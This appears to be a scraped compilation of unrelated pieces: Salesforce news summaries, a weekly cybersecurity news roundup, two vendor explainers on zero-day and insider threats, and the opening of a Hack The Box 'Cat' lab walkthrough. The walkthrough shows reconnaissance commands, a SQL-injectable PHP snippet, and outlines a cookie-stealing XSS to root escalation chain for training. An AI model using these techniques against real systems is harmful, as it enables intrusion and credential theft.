October 10, 2025: The chilling reality of a Salesforce.com data breach is a jarring wake-up call, not just for its customers, but for the entire cloud computing industry. 

Salesforce brings agentic AI to IT service management

October 9, 2025: Salesforce is bringing agentic AI to IT service management (ITSM). The CRM giant is taking aim at competitors like ServiceNow with Agentforce IT Service, a new IT support suite that leverages autonomous agents to resolve incidents and service requests.

Salesforce Trusted AI Foundation seeks to power the agentic enterprise

October 2, 2025: As Salesforce pushes further into agentic AI, its aim is to evolve Salesforce Platform from an application for building AI to a foundational operating system for enterprise AI ecosystems. The CRM giant took a step toward that vision today, announcing innovations across the Salesforce Platform, Data Cloud, MuleSoft, and Tableau.

Salesforce AI Research unveils new tools for AI agents

August 27, 2025: Salesforce AI Research announced three advancements designed to help customers transition to agentic AI: a simulated enterprise environment framework for testing and training agents, a benchmarking tool to measure the effectiveness of agents, and a data cloud capability for autonomously consolidating and unifying duplicated data.

Attackers steal data from Salesforce instances via compromised AI live chat tool

August 26, 2025: A threat actor managed to obtain Salesforce OAuth tokens from a third-party integration called Salesloft Drift and used the tokens to download large volumes of data from impacted Salesforce instances. One of the attacker’s goals was to find and extract additional credentials stored in Salesforce records that could expand their access.

Salesforce acquires Regrello to boost automation in Agentforce

August 19, 2025: Salesforce is buying Regrello to enhance Agentforce, its suite of tools for building autonomous AI agents for sales, service, and marketing. San Francisco-based startup Regrello specializes in turning data into agentic workflows, primarily for automating supply-chain business processes.

Salesforce adds new billing options to Agentforce

August 19, 2025: In a move that aims to improve accessibility for agentic AI, Salesforce announced new payment options for Agentforce, its autonomous AI agent suite.The new options, built on the flexible pricing the company introduced in May, allow customers to use Flex Credits to pay for the actions agents take.

Salesforce to acquire Waii to enhance SQL analytics in Agentforce

August 11, 2025: Salesforce has signed a definitive agreement to acquire San Francisco-based startup Waii for an undisclosed sum to enhance SQL analytics within Agentforce, its suite of tools aimed at helping enterprises build autonomous AI agents for sales, service, marketing, and commerce use cases.

Could Agentforce 3’s MCP integration push Salesforce ahead in the CRM AI race?

June 25, 2025: “[Salesforce’s] implementation of MCP is one of the most ambitious interoperability moves we have seen from a CRM vendor or any vendor. It positions Agentforce as a central nervous system for multi-agent orchestration, not just within Salesforce but across the enterprise,” said Dion Hinchcliffe, lead of the CIO practice at The Futurum Group. But it introduces new considerations around security.

Salesforce Agentforce 3 promises new ways to monitor and manage AI agents

June 24, 2025: This is the fourth version of Salesforce Agentforce since its debut in September last year, with the newest, Agentforce 3, succeeding the previous ‘2dx’ release. A new feature of the latest version is Agentforce Studio, which is also available as a separate application within Salesforce.

Salesforce supercharges Agentforce with embedded AI, multimodal support, and industry-specific agents

Jun 18, 2025: Salesforce is updating Agentforce with new AI features and expanding it across every facet of its ecosystem with the hope that enterprises will see the no-code platform as ready for tackling real-world digital execution, shaking its image of being a module for pilot projects.

CIOs brace for rising costs as Salesforce adds 6% to core clouds, bundles AI into premium plans

Jun 18, 2025: Salesforce is rolling out sweeping changes to its pricing and product packaging, including a 6% increase for Enterprise and Unlimited Editions of Sales Cloud, Service Cloud, Field Service, and select Industries Clouds, effective August 1.

Salesforce study warns against rushing LLMs into CRM workflows without guardrails

June 17, 2025: A new benchmark study from Salesforce AI Research has revealed significant gaps in how large language models handle real-world customer relationship management tasks.

Salesforce Industry Cloud riddled with configuration risks

June 16, 2025: AppOmni researchers found 20 insecure configurations and behaviors in Salesforce Industry Cloud’s low-code app building components that could lead to data exposure.

Salesforce changes Slack API terms to block bulk data access for LLMs

June 11, 2025: Salesforce’s Slack platform has changed its API terms of service to stop organizations from using Large Language Models to ingest the platform’s data as part of its efforts to implement better enterprise data discovery and search.

Salesforce to buy Informatica in $8 billion deal

May 27. 2025: Salesforce has agreed to buy Informatica in an $8 billion deal as a way to quickly access far more data for its AI efforts. Analysts generally agreed that the deal was a win-win for both companies’ customers, but for very different reasons. 

Salesforce wants your AI agents to achieve ‘enterprise general intelligence’

May 1, 2025: Salesforce AI Research unveiled a slate of new benchmarks, guardrails, and models to help customers develop agentic AI optimized for business applications.

Salesforce CEO Marc Benioff: AI agents will be like Iron Man’s Jarvis

April 17, 2025: AI agents are more than a productivity boost; they’re fundamentally reshaping customer interactions and business operations. And while there’s still work to do on trust and accuracy, the world is beginning a new tech era — one that might finally deliver on the promises seen in movies like Minority Report and Iron Man, according to Salesforce CEO Marc Benioff.

Agentblazer: Salesforce announces agentic AI certification, learning path

March 6, 2025: Hot on the heels of the release of Agentforce 2dx for developing, testing, and deploying AI agents, Salesforce introduced Agentblazer Status to its Trailhead online learning platform.

Salesforce takes on hyperscalers with Agentforce 2dx updates

March 6, 2025: Salesforce’s updates to its agentic AI offering — Agentforce — could give the CRM software provider an edge over its enterprise application rivals and hyperscalers including AWS, Google, IBM, Service Now and Microsoft.

Salesforce’s Agentforce 2dx update aims to simplify AI agent development, deployment

March 5, 2025: Salesforce released the third version of its agentic AI offering — Agentforce 2dx — to simplify the development, testing, and deployment of AI agents that can automate business processes across departments, such as sales, service, marketing, finance, HR, and operations.

Salesforce’s AgentExchange targets AI agent adoption, monetization

March 4, 2025: Salesforce is launching a new marketplace named AgentExchange for its agents and agent-related actions, topics, and templates to increase adoption of AI agents and allow its partners to monetize them.

Salesforce and Google expand partnership to bring Agentforce, Gemini together

February 25, 2025: The expansion of the strategic partnership will enable customers to build Agentforce AI agents using Google Gemini and to deploy Salesforce on Google Cloud.

AI to shake up Salesforce workforce with possible shift to sales over IT

February 5, 2025: With the help of AI, Salesforce can probably do without some staff. At the same time, the company needs salespeople trained in new AI products, CEO Marc Benioff has stated.

Salesforce’s Agentforce 2.0 update aims to make AI agents smarter

December 18, 2024: The second release of Salesforce’s agentic AI platform offers an updated reasoning engine, new agent skills, and the ability to build agents using natural language.

Meta creates ‘Business AI’ group led by ex-Salesforce AI CEO Clara Shih

November 20, 2024: The ex-CEO of Salesforce AI, Clara Shih, has turned up at Meta just a few days after quitting Salesforce. In her new role at Meta she will set up a new Business AI group to package Meta’s Llama AI models for enterprises.

CEO of Salesforce AI Clara Shih has left

November 15, 2024: The CEO of Salesforce AI, Clara Shih, has left after just 20 months in the job. Adam Evans, previously senior vice president of product for Salesforce AI Platform, has moved up to the newly created role of executive vice president and general manager of Salesforce AI.

Marc Benioff rails against Microsoft’s copilot

October 24, 2024: Salesforce’s boss doesn’t have a good word to say about Microsoft’s AI assistants, saying the technology is basically no better than Clippy 25 years ago.

Salesforce’s Financial Services Cloud targets ops automation for insurance brokerages

October 16, 2024: Financial Services Cloud for Insurance Brokerages will bring new features to help with commissions management and employee benefit servicing, among other things, when it is released in February 2025.

Explained: How Salesforce Agentforce’s Atlas reasoning engine works to power AI agents

September 30, 2024: AI agents created via Agentforce differ from previous Salesforce-based agents in their use of Atlas, a reasoning engine designed to help these bots think like human beings.

5 key takeaways from Dreamforce 2024

September 20, 2024: As Salesforce’s 2024 Dreamforce conference rolls up the carpet for another year, here’s a look at a few high points as Salesforce pitched a new era for its customers, centered around Agentforce, which brings agentic AI to enterprise sales and service operations.

Alation and Salesforce partner on data governance for Data Cloud

September 19, 2024: Data intelligence platform vendor Alation has partnered with Salesforce to deliver trusted, governed data across the enterprise. It will do this, it said, with bidirectional integration between its platform and Salesforce’s to seamlessly delivers data governance and end-to-end lineage within Salesforce Data Cloud. This enables companies to directly access key metadata (tags, governance policies, and data quality indicators) from over 100 data sources in Data Cloud, it said.

New Data Cloud features to boost Salesforce’s AI agents

September 17, 2024: Salesforce added new features to its Data Cloud to help enterprises analyze data from across their divisions and also boost the company’s new autonomous AI agents released under the name Agentforce, the company announced at the ongoing annual Dreamforce conference.

Dreamforce 2024: Latest news and insights

September 17, 2024: Dreamforce 2024 boasts more than 1,200 keynotes, sessions and workshops. While this year’s Dreamforce will encompass a wide spectrum of topics, expect Salesforce to showcase Agentforce next week at Dreamforce.

Salesforce unveils Agentforce to help create autonomous AI bots

September 12, 2024: The CRM giant’s new low-code suite enables enterprises to build AI agents that can reason for themselves when completing sales, service, marketing, and commerce tasks.

Salesforce to acquire data protection specialist Own Company for $1.9 billion

September 6, 2024: The CRM company said Own’s data protection and data management solutions will help it enhance availability, security, and compliance of customer data across its platform.

Salesforce previews new XGen-Sales model, releases xLAM family of LLMs

September 6, 2024: The XGen-Sales model, which is based on the company’s open source APIGen and its family of large action models (LAM), will aid developers and enterprises in automating actions taken by AI agents, analysts say.

Salesforce mulls consumption pricing for AI agents

August 30, 2024: Investors expect AI agent productivity gains to reduce demand for Salesforce license seats. CEO Marc Benioff says a per-conversation pricing model is a likely solution.

Coforge and Salesforce launch new offering to accelerate net zero goals

August 27, 2024: Coforge ENZO is designed to streamline emissions data management by identifying, consolidating, and transforming raw data from various emission sources across business operations.

Salesforce unveils autonomous agents for sales teams

August 22, 2024: Salesforce today announced two autonomous agents geared to help sales teams scale their operations and hone their negotiation skills. Slated for general availability in October, Einstein Sales Development Rep (SDR) Agent and Einstein Sales Coach Agent will be available through Sales Cloud, with pricing yet to be announced.

Salesforce to acquire PoS startup PredictSpring to augment Commerce Cloud

August 2, 2024: Salesforce has signed a definitive agreement to acquire cloud-based point-of-sale (PoS) software vendor PredictSpring. The acquisition will augment Salesforce’s existing Customer 360 capabilities.

Einstein Studio 1: What it is and what to expect

July 31, 2024: Salesforce has released a set of low-code tools for creating, customizing, and embed AI models in your company’s Salesforce workflows. Here’s a first look at what can be achieved using it.

Why are Salesforce and Workday building an AI employee service agent together?

July 26, 2024: Salesforce and Workday are partnering to build a new AI-based employee service agent based on a common data foundation. The agent will be accessible via their respective software interfaces.

Salesforce debuts gen AI benchmark for CRM

June 18, 2024: The software company’s new gen AI benchmark for CRM aims to help businesses make more informed decisions when choosing large language models (LLMs) for use with business applications.

Salesforce updates Sales and Service Cloud with new capabilities

June 6, 2024: The CRM software vendor has added new capabilities to its Sales Cloud and Service Cloud with updates to its Einstein AI and Data Cloud offerings, including additional generative AI support.

IDC Research: Salesforce 1QFY25: Building a Data Foundation to Connect with Customers

June 5, 2024: Salesforce reported solid growth including $9.13 billion in revenue or 11% year-over-year growth. The company has a good start to its 2025 fiscal year, but the market continues to shift in significant ways, and Salesforce is not immune to those changes.

IDC Research: Salesforce Connections 2024: Making Every Customer Journey More Personalized and Profitable Through the Einstein 1 Platform

June 5, 2024: The Salesforce Connections 2024 event showcased the company’s efforts to revolutionize customer journeys through its innovative artificial (AI)-driven platform, Einstein 1. Salesforce’s strategic evolution at Connections 2024 marks a significant step forward in charting the future of personalized and efficient AI-driven customer journeys.

Salesforce launches Einstein Copilot for general availability

April 25, 2024: Salesforce has announced the general availability of its conversational AI assistant along with a library of pre-programmed ‘Actions’ to help sellers benefit from conversational AI in Sales Cloud.

Salesforce debuts Zero Copy Partner Network to streamline data integration

April 25, 2024: Salesforce has unveiled a new global ecosystem of technology and solution providers geared to helping its customers leverage third-party data via secure, bidirectional zero-copy integrations with Salesforce Data Cloud.

Salesforce-Informatica acquisition talks falls through: Report

April 22, 2024: Salesforce’s negotiations to acquire enterprise data management software provider Informatica have fallen through as both couldn’t agree on the terms of the deal. The disagreement about the terms of the deal is more likely to be around the price of each share of Informatica.

Decoding Salesforce’s plausible $11 billion bid to acquire Informatica

April 17, 2024: Salesforce is seeking to acquire enterprise data management vendor Informatica, in a move that could mean consolidation for the integration platform-as-a-service (iPaaS) market and a new revenue stream for Salesforce.

Salesforce adds Contact Center updates to Service Cloud

March 26, 2024: Salesforce has announced new Contact Center updates to its Service Cloud, including features such as conversation mining and generative AI-driven survey summarization.

Salesforce bids to become AI’s copilot building platform of choice

March 7, 2024: Salesforce has entered the race to offer the preeminent platform for building generative AI copilots with Einstein 1 Studio, a new set of low-code/no-code AI tools for accelerating the development of gen AI applications. Analysts say the platform has all the tools to become the platform for building out and deploying gen AI assistants.

Salesforce rebrands its low-code platform to Einstein 1 Studio

March 6, 2024: Salesforce has rebranded its low-code platform to Einstein 1 Studio and bundled it with the company’s Data Cloud offering. The platform has added a new feature, Prompt Builder, which allows developers to create reusable LLM prompts without the need for writing code.

Salesforce’s Einstein 1 platform to get new prompt-engineering features

February 9, 2024: Salesforce is working on adding two new prompt engineering features to its Einstein 1 platform to speed up the development of generative AI applications in the enterprise. The features include a testing center and the provision of prompt engineering suggestions.


The Good, the Bad and the Ugly in Cybersecurity – Week 44

31 October 2025 at 09:11

The Good | Former GM of DoD Contractor Pleads Guilty to Selling U.S. Cyber Secrets

Peter Williams, a former general manager at U.S. defense contractor L3Harris Trenchant, has pleaded guilty in U.S. federal court to two counts of stealing and selling classified cybersecurity tools and trade secrets to a Russian exploit broker.

Between 2022 and 2025, Williams stole at least eight restricted cyber-exploit components that were developed for the U.S. government and select allied partners. The DoJ stated that these tools, valued at $35 million, were part of Trenchant’s sensitive research and were never intended for foreign sale. Williams sold them for at least $1.3 million in cryptocurrency, signing formal contracts with the Russian intermediary for the initial sale of the components as well as a promise to provide follow-on technical support. Williams used the illicit proceeds to purchase luxury items, according to court filings.

Trenchant, L3Harris Technologies’ cyber capabilities arm, develops advanced offensive and defensive tools used by government agencies within the Five Eyes intelligence alliance. According to the DoJ, Williams abused his privileged access at Trenchant Systems to siphon the data, giving various customers of the broker, including the Russian government and other foreign cyber threat actors, an edge in targeting U.S. citizens, businesses, and critical infrastructure.

While the court reports did not name the broker, prior reporting suggests it may be Operation Zero, a Russian platform known for buying and reselling zero-day exploits, often rewarding developers with large cryptocurrency payouts.

Source: X via CyberScoop

Williams now faces up to 10 years in prison and fines of $250,000 or twice the profit gained. As international cyber brokers expand in their roles as international arms dealers, law enforcement officials reaffirm their hard stance against malicious insiders abusing their positions of trust.

The Bad | New “Brash” Flaw Crashes Chromium Browsers with Timed Attacks

Security researcher Jose Pino has disclosed a severe vulnerability in Chromium’s Blink rendering engine that allows attackers to crash Chromium-based browsers within seconds. Pino has named the vulnerability “Brash” and attributes it to an architectural oversight that fails to rate-limit updates to the document.title API. Without the rate-limiting, an attacker can generate millions of document object model (DOM) mutations per second by repeatedly changing the page title, overwhelming the browser, and consuming CPU resources until the UI thread becomes unresponsive.

Source: GitHub

The Brash exploit occurs in three phases. First, the attacker prepares a hash seed by loading 100 unique 512-character hexadecimal strings into memory to vary title updates and maximize the impact of the attack. Then, the attacker launches burst injections that perform three consecutive document.title updates in a row, which in default test settings inject roughly 24 million updates per second using a burst size of 8,000 and a 1 ms interval. Lastly, the sustained stream of updates saturates the browser’s main thread, forcing both the tab and the browser to hang or crash and requiring forced termination.

Brash can be scheduled to run at precise moments, enabling a logic-bomb style attack that remains dormant until a timed trigger activates. This increases the danger since attackers can control when the large-scale disruption will occur. Hypothetically, a single click on a specially crafted URL can detonate the attack with millisecond accuracy and little initial indication.

The vulnerability affects Google Chrome and all Chromium-based browsers, including Microsoft Edge, Brave, Opera, Vivaldi, Arc, Dia, OpenAI ChatGPT Atlas, and Perplexity Comet. WebKit-based browsers such as Mozilla Firefox and Apple Safari are not vulnerable to Brash as well as any iOS third-party browsers.

The Ugly | Hacktivists Manipulate Canadian Industrial Systems, Triggering Safety Risks

The Canadian Centre for Cyber Security has issued a warning that hacktivists have breached multiple critical infrastructure systems across Canada, altering industrial controls in ways that could have created dangerous conditions. The alert highlights rising malicious activity that targets internet-exposed Industrial Control Systems (ICS) and urges firms to shore up their security measures to prevent such attacks.

The bulletin cites three recent incidents. In the first, a water treatment facility experienced tampering with water pressure controls, degrading service for the local community. Following that, a Canadian oil and gas company had its Automated Tank Gauge (ATG) manipulated, triggering false alarms. In a third breach, a grain drying silo on a farm had temperature and humidity settings altered, creating potentially unsafe conditions if the changes had gone undetected.

Authorities believe these attacks were opportunistic rather than being technically sophisticated, and intended to attract media attention, underme public trust, and harm the reputation of Canadian authorities. Hacktivists have been known to collaborate with advanced persistent threat (APT) groups to amplify the reach of disruptive acts and cause public unrest.

Although none of the targeted facilities suffered damage, the incidents underline inherent risks in poorly protected ICS, including programmable logic controllers (PLCs), supervisory control and data acquisition (SCADA) systems, human-machine interfaces (HMIs), and industrial IoT devices.

The Cyber Centre recommends that organizations inventory and secure internet-accessible ICS devices, remove direct internet exposure where possible, implement VPNs with multi-factor authentication (MFA), maintain regular firmware updates, and conduct regular penetration testing. Resources like the Cyber Security Readiness Goals (CRGs) can offer guidance for critical infrastructure firms and officials remind organizations that suspicious activity should be reported via My Cyber Portal or to local authorities to reduce risks of future compromise.

Source: Canadian Centre for Cyber Security

How to Detect and Mitigate Zero-Day Vulnerabilities

30 September 2025 at 07:00

Developer screen with code representing cyber threats and zero-day exploits

Companies face more sophisticated, unpredictable cyber threats. Zero Day vulnerabilities are among the greatest risks, as these software flaws are unknown and exploited before a fix is available, potentially compromising thousands of organizations.

Stopping zero-day attacks is a top priority for security teams, requiring faster identification, detection, and mitigation to prevent damage. But how do these attacks work, and what practices really help?

Introducing the Problem: What Is a Zero-Day Attack?

A zero-day vulnerability is a hidden security flaw unknown to vendors or developers. Without an immediate fix, systems remain exposed to attacks. These vulnerabilities are particularly dangerous and pose complex risk-management challenges. Adversaries can exploit them before the flaw becomes public or is patched, causing significant harm. The term “zero-day” reflects that defenders have had zero days to prepare.

Within this definition, another concept matters: the zero-day exploit. Although related, vulnerability and exploit are different—and recognizing that difference is critical.

Zero-Day Exploit Definition: What They Are and How They Work

A Zero Day exploit is the tool hackers use to leverage a vulnerability. They can be highly damaging and difficult to defend against and are often sold on the dark web, making them valuable and dangerous.

When an attacker discovers a vulnerability unknown to anyone else, they develop specific code to exploit it and integrate it into malware. Once that code executes on the system, it can give the attacker control or access to sensitive information.

There are several ways to exploit a Zero Day vulnerability. One of the most common is through phishing: emails with infected attachments or links containing the hidden exploit. By clicking or opening the file, the malware activates and compromises the system without the user noticing.

A well-known case was the attack on Sony Pictures Entertainment in 2014.[1] Cybercriminals used a Zero Day exploit to leak confidential information such as unreleased movie copies, internal emails, and private documents.

Which Systems Are Most Targeted for Zero-Day Exploitation?

Abstract programming background illustrating potential software targets

Threat actors frequently target high-value systems and supply chains. Common targets include:

  • Operating Systems: Windows, macOS, Linux.
  • Web Browsers: Engines, plugins, and extensions (Chromium, Firefox, Brave, etc.).
  • Office Suites: Microsoft Office, Google Workspace.
  • Mobile OS: iOS and Android.
  • CMS Platforms: WordPress, Joomla, Drupal (core, plugins, themes).
  • Network/IoT Devices: Routers, firewalls, connected devices.
  • Enterprise Apps: ERP/CRM like SAP and Oracle.

Techniques to Identify Zero-Day Vulnerabilities

Cyber analyst using machine learning to detect zero-day exploits

Facing Zero Day vulnerabilities requires a combination of technological foresight and constant monitoring of the digital environment. In this scenario, having a trusted partner can make a difference, helping organizations reduce risks and proactively strengthen their security posture. Various techniques also help detect and neutralize potential Zero Day attacks.

  1. Vulnerability Scanning

    Periodic scans of systems and network vulnerabilities identify potential weaknesses, such as flaws in unknown software providers. Early detection allows rapid mitigation through patching and other security updates.

  2. Behavioral Anomaly Detection

    Monitoring network and system behavior can detect anomalies indicating deviations from normal operation. Abnormal network traffic, unusual resource usage, or unauthorized access attempts may indicate Zero Day exploitation attempts. 

  3. Signature-Less Analytics

    Advanced threat detection methods, like anomaly detection and machine learning algorithms, allow for identifying suspicious behavior without relying on known attack signatures.

  4. Threat Intelligence

    Threat intelligence channels and information-sharing communities provide relevant data on emerging threats and Zero Day vulnerabilities. Organizations can proactively monitor associated vulnerability indicators, enabling timely defensive actions.

  5. Sandboxing & Emulation

    Sandboxing and emulation techniques allow for analyzing suspicious files or executables in isolated environments. Behavioral analysis in a controlled setting helps detect potential Zero Day exploits early.

  6. User Behavior Analytics (UBA)

    UBA solutions can detect anomalies indicating Zero Day attacks, such as unusual login locations or unauthorized privilege escalation. Essentially, they monitor user activity and access patterns.

  7. Continuous Monitoring & IR Readiness

    Robust monitoring practices and incident response procedures enable rapid detection, investigation, and mitigation of Zero Day attacks. Periodic security audits, penetration testing, and simulation exercises improve organizational readiness against threats.

Strengthening Defenses Against Zero-Day Vulnerabilities

It is clear that implementing comprehensive security strategies is essential. Measures combining continuous monitoring, proactive detection, and automated response allow organizations to anticipate attacks and significantly reduce risks.

Integrating advanced solutions helps protect critical systems before vulnerabilities are exploited. Adopting a Zero Trust approach is crucial for minimizing risks associated with Zero Day vulnerabilities. This security philosophy, which continuously validates every access and privilege, ensures that even if an exploit enters, its impact is effectively contained.

With the support of experts and specialized tools, organizations can strengthen their cybersecurity posture, maintain operational continuity, and protect sensitive information. While this process is not simple, in a technology-driven world, both for better and worse, it has become a priority.

References
1. Alex Altman. (2014, Dec 22). “No Company Is Immune to a Hack Like Sony’s.” Time.

What Is an Insider Threat?

12 August 2025 at 02:00

Virus alert

In 2024, the average cost of an insider threat incident reached $17.4 million.[1] When you consider that these types of incidents happen daily, it becomes clear that we’re facing a frequent and expensive danger. So, what is an insider threat? Today, it means much more than a data leak; it’s a strategic vulnerability that can disrupt business continuity.

What Is an Insider Threat in Cybersecurity?

In cybersecurity, the danger doesn’t always come from outside. Insider threats are security risks originating within the organization, caused by someone who works there or has authorized access to its systems and networks. These threats may be intentional or accidental.

According to the Cost of Insider Risks 2025 report, 55% of internal security incidents are caused by employee errors or negligence.[2] What does that mean? You don’t need to plan a cybercrime to compromise a company’s security; sometimes, a single mistaken click is enough.

One of the biggest dangers of insider threats in cybersecurity is how easily they go unnoticed. Since the actors involved often use valid credentials, they don’t immediately raise red flags. How can these attacks be prevented? By strengthening internal policies, training employees, and implementing vulnerability management tools with proactive monitoring to detect suspicious activity from the inside.

Insider Threats in Action: Understanding Internal Risk Profiles

Spotting an insider threat isn’t always as straightforward as identifying an external hacker. Insider threat detection involves recognizing the different profiles that may pose a risk within the organization. From human error to calculated sabotage, understanding insider threat types is key to building an effective defense.

1. Intentional/Malicious Insider

These are deliberate actions carried out by current or former employees who are dissatisfied with the company. Motivated by this discontent, they may steal sensitive data, sabotage systems, or manipulate critical information. In some cases, they even collaborate with external actors.

These insiders are particularly dangerous because their actions are often well-planned and difficult to detect in time. They may wait for the right opportunity to exploit a system vulnerability, use social engineering techniques, or erase logs to avoid being caught.

In 2018, Tesla experienced a well-known malicious insider incident when a former employee was accused of sabotage.[3] According to Elon Musk, the employee stole confidential data and modified the code of the manufacturing operating system.

2. Negligent Insider

man on computer

This threat stems from mistakes or poor practices rather than malicious intent. Often the result of ignorance or carelessness, common examples include falling for phishing scams, overlooking security protocols, or misconfiguring systems.

In 2017, defense contractor Booz Allen Hamilton exposed over 60,000 sensitive files on an unsecured Amazon Web Services (AWS) server.[4] The data included classified information from the U.S. Army Intelligence and Security Command (INSCOM).

3. Compromised / Third‑Party Insider

This category includes external users such as contractors, vendors, or former employees whose legitimate access has been hijacked. They function as insiders because they operate with valid credentials, making it easier to leak data or spread malware from within. In many cases, compromised insiders result from internal negligence.

In March 2025, Royal Mail suffered a massive data breach after attackers accessed its network through an external vendor, Spectos GmbH.[5] Using stolen credentials, they bypassed internal controls and exfiltrated over 144 GB of customer information, including personal data, internal recordings, and mailing lists.

Accepting that the threat may come from within requires a shift in how we approach security, toward a more human-centric, dynamic, and preventive model. Strengthening cyber resilience means going beyond just identifying threats. It involves rethinking assumptions about who poses a risk and why, and building a truly holistic security culture.

Internal Threat Indicators: Signs Worth Investigating

When someone with insider access launches an attack, they may need to hack internal systems or reconfigure hardware or software infrastructure. Recognizing the signs and tools involved is key to identifying insider risk and responding proactively.

Unusual Login Behavior

Most organizations follow predictable login patterns. Remote access from unusual locations or during off-hours can signal trouble. Authentication logs can also reveal strange username activity, like accounts named "test" or "admin," indicating unauthorized access attempts.

Use of Unauthorized Applications

Critical customer and business management systems, as well as financial platforms, should be tightly controlled. These tools must have clearly defined user roles. Any unauthorized access to these applications, or to the sensitive data they contain, can be devastating to a business.

Privilege Escalation Behavior

People with higher-level system access pose an inherent risk. Sometimes, an administrator may begin granting privileges to unauthorized users, or even to themselves, to gain access to restricted data or apps.

Excessive Data Downloads or Transfers

LevelBlue

IT teams must stay alert to their network’s regular bandwidth usage and data transfer patterns. Large, unexplained downloads, especially during odd hours or from unusual locations, may signal an internal threat.

Unauthorized Changes to Firewalls and Antivirus Tools

Any time firewall or antivirus configurations are altered, it could indicate insider tampering. These changes are often subtle attempts to weaken system defenses and create an easy path for future malicious activity.

The Threat Is Internal, but so is the Opportunity

Insider threats aren’t just technical failures; they reflect human dynamics, outdated processes, and gaps in security infrastructure. Building effective protection demands a proactive, evolving strategy, one that combines robust tools with prepared teams.

At LevelBlue, our simplified approach to cybersecurity with comprehensive managed security services helps organizations identify abnormal patterns, prevent unauthorized access, and respond to insider threats in real time. Our ecosystem of solutions enables continuous, agile defense, turning every threat into an opportunity for long-term improvement.

References
1. DTEX Systems. (2025, Feb 25). Ponemon Cybersecurity Report: Insider Risk Management Enabling Early Breach Detection and Mitigation.
2. DTEX Systems. (2025, Feb 25). Ponemon Cybersecurity Report: Insider Risk Management Enabling Early Breach Detection and Mitigation.
3. Mark Matousek. (2018, June 18). Elon Musk is accusing a Tesla employee of trying to sabotage the company. Business Insider.
4. Patrick Howell O'Neill (2017, June 1). Booz Allen Hamilton leaves 60,000 unsecured DOD files on AWS server. CiberScoop.
5. Check Red Security. (2025, April 14). When Trusted Access Turns Dangerous: Insider Risks in the Age of Third‑Party Vendors.

Hack The Box: Cat Machine Walkthrough – Medium Diffculity

By: darknite
5 July 2025 at 10:58
Reading Time: 13 minutes

Introduction

This write-up details the “Cat” machine from Hack The Box, a Medium-rated Linux challenge.

Objective on Cat Machine

The goal is to complete the “Cat” machine by accomplishing the following objectives:

User Flag:

To obtain the user flag, an attacker first exploits a Stored Cross-Site Scripting (XSS) vulnerability in the user registration form, which allows stealing the administrator’s session cookie. With this stolen session, the attacker accesses the admin panel and exploits an SQL Injection flaw to extract sensitive user credentials from the database. After cracking these credentials, SSH access is gained as a regular user, enabling the retrieval of the user flag—a secret token proving user-level access.

Root Flag:

For the root flag, privilege escalation is performed by finding a vulnerable image processing script owned by the root user. The attacker crafts a malicious image payload that executes unauthorised commands with root privileges. This leads to obtaining a root shell—the highest level of system access—allowing capture of the root flag, which confirms full control over the machine.

Reconnaissance and Enumeration on Cat Machine

Establishing Connectivity

I connected to the Hack The Box environment via OpenVPN using my credentials, running all commands from a Parrot OS virtual machine. The target IP address for the Dog machine was 10.10.11.53.

Initial Scanning

To identify open ports and services, I ran an Nmap scan:

nmap -sC -sV 10.10.11.53 -oA initial

Nmap Output:

┌─[dark@parrot]─[~/Documents/htb/cat]
└──╼ $ nmap -sC -sV -oA initial -Pn 10.10.11.53
# Nmap 7.94SVN scan initiated Tue Jun 17 10:05:26 2025 as: nmap -sC -sV -oA initial -Pn 10.10.11.53
Nmap scan report for 10.10.11.53
Host is up (0.017s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
|   256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
|_  256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://cat.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jun 17 10:05:33 2025 -- 1 IP address (1 host up) scanned in 7.38 seconds

Analysis:

  • Port 22 (SSH): OpenSSH 8.2p1 on Ubuntu 4ubuntu0.11 risks remote code execution if unpatched (e.g., CVE-2021-28041).
  • Port 80 (HTTP): Apache 2.4.41, vulnerable to path traversal (CVE-2021-41773), redirects to cat.htb, hinting at virtual host misconfigurations.

Web Enumeration:

Perform directory fuzzing to uncover hidden files and directories.

gobuster dir -u http://cat.htb -w /opt/common.txt

Let’s perform directory enumeration with Gobuster to identify any potentially useful resources.

Gobuster Output:

Web Path Discovery (Gobuster):

  • /.git Directory: Exposed Git repository risks source code leakage, revealing sensitive data like credentials or application logic.
  • /admin.php, /join.php, and Other Paths: Discovered sensitive endpoints may lack authentication, enabling unauthorised access or privilege escalation.

The website features a typical interface with user registration, login, and image upload functionalities, but the presence of an exposed .git directory and accessible admin endpoints indicate significant security vulnerabilities.

Git Repository Analysis with git-dumper

Utilised the git-dumper tool to clone the exposed Git repository by executing the command git-dumper http://cat.htb/.git/ git. Subsequently, employed a Git extraction tool to retrieve critical source code files, including join.php, admin.php, and accept_cat.php, for further analysis.

Within the cloned Git repository, several PHP files were identified, meriting further examination for potential vulnerabilities or insights.

Source Code Analysis and Review on Cat Machine

Source Code Review of accept_cat.php

The accept_cat.php file is intended to let the admin user 'axel' Accept a cat by inserting its name into the accepted_cats table and deleting the corresponding entry from the cats table. The script correctly verifies the user’s session and restricts actions to POST requests, which is good practice. However, it constructs the insertion SQL query by directly embedding the $cat_name variable without any sanitisation or use of prepared statements:

$sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
$pdo->exec($sql_insert);

This exposes the application to SQL injection attacks, as malicious input in catName could manipulate the query and compromise the database. On the other hand, the deletion query is properly parameterised, reducing risk. To secure the script, the insertion should also use prepared statements with bound parameters. Overall, while session checks and request validation are handled correctly, the insecure insertion query represents a critical vulnerability in accept_cat.php.

Vulnerability Review of admin.php

This admin page lets the user ‘axel’ manage cats by viewing, accepting, or rejecting them. It correctly checks if the user is logged in as ‘axel’ before allowing access and uses prepared statements to fetch cat data from the database safely. The cat details are displayed with proper escaping to prevent cross-site scripting attacks.

